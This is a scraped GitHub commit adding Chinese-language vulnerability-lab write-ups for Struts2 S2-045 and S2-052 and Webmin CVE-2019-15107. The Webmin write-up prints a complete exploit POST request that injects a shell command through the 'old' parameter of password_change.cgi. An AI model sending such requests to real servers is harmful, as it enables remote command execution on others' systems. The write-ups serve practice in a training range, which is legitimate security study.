-
Notifications
You must be signed in to change notification settings - Fork 513
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
6237d58
commit 0af4309
Showing
18 changed files
with
85 additions
and
8 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Binary file not shown.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
# struts2-045(CVE-2017-5638)by [hu4wufu](https://github.com/hu4wufu) | ||
|
||
## 漏洞描述 | ||
|
||
Struts2 存在远程代码执行的严重漏洞; 目前 Struts2 官方已经确认漏洞(漏洞编号 S2-045 , CVE 编号: CVE-2017-5638 ),并定级为高风险。 | ||
|
||
## 影响版本 | ||
|
||
- Struts 2.3.5 – Struts 2.3.31 | ||
- Struts 2.5 – Struts 2.5.10 | ||
|
||
## 利用流程 | ||
|
||
访问地址: `10.10.11.20:31433` | ||
|
||
名称:vulfocus/struts-045 | ||
|
||
使用Struts2全版本漏洞测试工具获取 flag 成功 | ||
|
||
![1](./1.png) | ||
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
# struts2-052(CVE-2017-9805)by [hu4wufu](https://github.com/hu4wufu) | ||
|
||
## 漏洞描述 | ||
|
||
2017年9月5日,Apache Struts 官方发布最新的安全公告称,Apache Struts 2.5.x 的 REST 插件存在远程代码执行高危漏洞,漏洞编号为 CVE-2017-9805(S2-052),攻击者可以通过构造恶意 XML 请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用 XStreamHandler 反序列化 XStream 实例的时候没有执行严格的过滤导致远程代码执行。 | ||
|
||
## 影响版本 | ||
|
||
Struts 2.5 - Struts 2.5.12 | ||
|
||
## 利用流程 | ||
|
||
使用Struts2全版本漏洞测试工具获取 flag 成功 | ||
|
||
![52](./52.png) | ||
|
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
# Webmin远程命令执行漏洞(CVE-2019-15107)by [hu4wufu](https://github.com/hu4wufu) | ||
|
||
## 概述 | ||
|
||
Webmin 被爆出1.920版本之前存在一个远程命令执行漏洞(CVE-2019-15107),当用户开 Webmin 密码重置功能后,攻击者利用该漏洞可在易受损系统中执行任意命令,进而获取系统 Shell。由于Webmin 中 Password_Change.cgi 在接收请求的处理过程中,old 参数存在命令注入漏洞,可被攻击者恶意利用。 | ||
|
||
## 影响版本 | ||
|
||
Webmin 1.920及以下版本。 | ||
|
||
## 漏洞复现 | ||
|
||
1、打开靶场,开启Webmin的漏洞环境。 | ||
|
||
![image-20200821155246605](./1.png) | ||
|
||
2、抓取数据包,修改数据,利用poc进行验证,发现有回显。 | ||
|
||
![image-20200821155231196](./2.png) | ||
|
||
``` | ||
POST /password_change.cgi HTTP/1.1 | ||
Host: 118.193.36.37:9211 | ||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 | ||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | ||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | ||
Accept-Encoding: gzip, deflate | ||
Content-Type: application/x-www-form-urlencoded | ||
Content-Length: 65 | ||
Origin: https://118.193.36.37:9211 | ||
Connection: close | ||
Referer: https://118.193.36.37:9211/ | ||
Cookie: redirect=1; testing=1 | ||
Upgrade-Insecure-Requests: 1 | ||
user=rootxx&pam=&expired=2&old=test|ls /tmp&new1=test2&new2=test2 | ||
``` | ||
|
||
3、直接查看FLag | ||
|
||
![image-20200821155159221](./3.png) | ||
|
Binary file added
BIN
+127 KB
writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/image-20200821155114277.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.